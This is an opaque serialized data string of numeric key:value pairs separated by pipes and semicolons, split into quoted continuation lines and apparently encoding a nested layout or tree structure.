0|2:2|3:2520|4:2376|17:24|18:24;n;15;9|9:162|10:2521;p;1|1:1780|2:2|3:2522|15:2366|4:2367|17:24|18:24;n;16|37:2523|22:2524;p;18|5:84|3:2525|15:370|4:1863|27:25|17:25|32:25|21:25|26:25|18:25|5:84|5:84;n;13|28:1864;p;1|33:1793|3:2526|15:21|4:1795|27:25|17:25|32:25|21:25|26:25|18:25;n;17|1:1796|9:1797|10:1798;17|1:1796|9:1797|10:1799;9|9:2527|10:2528;p;1|1:421|2:2|3:2529|15:1883|4:730|17'
- ..':24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;9|9:318|10:2530;p;18|5:131|3:2531|15:2532|4:1860|27:25|17:25|32:25|21:25|26:25|18:25|5:131|5:131;n;13|28:1861;p;1|5:1848|14:395|3:2533|15:2534|16:2535|4:1852|5:1848|5:1848;1|2:2|5:1784|3:2536|15:150|4:1806|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:2537|15:996|4:1803|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:2538|15:2539|4:1810|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;13|28:1814|29:214;9|9:1800|10:2540;p;1|2:2|5:1784|3:2541|15:115|4:1788|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;7|1:450;p;1|1:421|2:2|5:19|3:2542|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2543|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2544|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2545|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2546|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2547|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2548|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2549|15:115|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1784|3:2550|15:115|4:1788|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;9|9:1789|10:2551;p;1|2:2|5:1784|3:2552|15:150|4:1806|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:2553|4:389|17:25|18:24|5:1784|5:1784;n;11|24:25;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;9|9:1951|10:2554;p;1|1:421|2:2|3:2555|15:1883|4:2376|17:24|18:24;n;3|5:424|4'
- ..':6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1784|3:2556|15:1883|4:1810|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;13|28:1811|29:214;p;18|2:2|3:2557|15:1218|4:1877|17:24;1|5:1848|14:395|3:2558|15:153|16:2559|4:1852|5:1848|5:1848;1|1:421|2:2|3:2560|15:115|4:2561|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2562|15:115|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2563|15:2564|4:1870|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|5:1848|14:395|3:2565|15:2566|16:2567|4:1852|5:1848|5:1848;1|5:1848|14:395|3:2568|15:2504|16:2569|4:1852|5:1848|5:1848;1|1:421|2:2|3:2570|15:537|4:1857|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2571|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2572|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2573|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2574|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2575|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2576|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2577|15:21|4:608|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2578|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2579|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|2:2|3:2580|15:21|4:427;n;4|9:468|10:1503;p;1|2:2|3:2581|4:15;n;4|9:468|10:2582;4|9:428|10:1692;p;1|2:2|3:2583|15:996|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:428|10:1690;p;1|1:1780|2:2|3:2584|15:2585|4:1783;1|1:1780|2:2|3:2586|15:2587|4:1783;1|1:1780|2:2|3:2588|15:2589|4:1783;1|1:1780|2:2|3:2590'
- ..'|15:2591|4:1783;1|1:1780|2:2|3:2592|15:2593|4:1783;1|1:1780|2:2|3:2594|15:2595|4:1783;1|1:1780|2:2|3:2596|15:2597|4:1783;1|1:421|2:2|5:19|3:2598|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2599|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2600|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2601|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2602|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2603|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2604|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2605|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2606|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2607|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2608|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2609|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2610|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2611|15:996|4:15;1|2:2|3:2612|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:468|10:2613;p;1|1:421|2:2|5:19|3:2614|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2615|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2616|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2617|15:153|4:423|1'
- ..'7:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2618|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2619|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2620|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2621|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2622|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2623|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2624|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2625|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2626|15:21|4:467;n;4|9:428|10:1043;4|9:468|10:2242;p;1|1:421|2:2|3:2627|15:21|4:608|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2628|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;p;1|3:2629|15:2630|4:2631|27:25|17:25|32:25|21:25|26:25|18:25;n;9|9:119|10:2632;9|9:119|10:2633;9|9:119|10:2634;9|9:119|10:2635;9|9:2636|10:2637;9|9:119|10:2638;9|9:119|10:2639;9|9:119|10:2640;p;1|2:2|3:2641|15:133|4:2642;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|2:2|3:2643|15:1322|4:2642;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|2:2|5:131|14:395|3:2644|15:1285|4:398|5:131|5:131;1|2:2|5:131|14:395|3:2645|15:1287|4:398|5:131|5:131;1|1:403|2:2|5:404|3:2646|15:1289|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:2647|15:1287|4:398|5:131|5:131;1|2:2|5:131|14:395|3:2648|15:1285|4:414|5:131|5:131;n;4|9:141|10:2271;p;1|2:2|5:131|14:395|3:2649|15:1285|4:419|18:24|5:131|5:131;n;4|9:258|10:2650;4|9:258|10:1294;4|9:258|10:1296;p;1|1:421|2:2|5:'
- ..'19|3:2651|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2652|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2653|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2654|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2655|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2656|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2657|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2658|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2659|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2660|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2661|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2662|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2663|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2664|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2665|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2666|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2667|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2668|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2669|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:1'
- ..'9|3:2670|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2671|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2672|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2673|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|3:2674|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2675|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2676|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2677|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2678|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2679|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2680|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2681|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2682|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2683|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2684|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2685|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2686|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2687|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2688|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2689|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6'
- ..'|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2690|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2691|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2692|15:325|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2693|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2694|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2695|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2696|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2697|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2698|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2699|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2700|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2701|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2702|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2703|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2704|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2705|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2706|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2707|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2708|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2709|15:325|4:42'
- ..'3|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2710|15:996|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:10|10:1272;4|9:10|10:1273;p;1|1:421|2:2|5:19|3:2711|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2712|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2713|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2714|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2715|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2716|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2717|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2718|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2719|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2720|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2721|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2722|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2723|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2724|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2725|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2726|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2727|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19'
- ..'|3:2728|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2729|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2730|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2731|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2732|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2733|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2734|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2735|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2736|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2737|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2738|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2739|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2740|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2741|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2742|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2743|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2744|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2745|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2746|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:'
- ..'424|5:424;p;1|1:421|2:2|5:19|3:2747|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2748|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2749|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2750|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2751|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2752|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2753|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2754|15:21|4:427;n;4|9:468|10:1503;4|9:428|10:1502;p;1|1:421|2:2|5:19|3:2755|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2756|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2757|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2758|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2759|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2760|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2761|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2762|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2763|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2764|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2765|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:2766|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;'
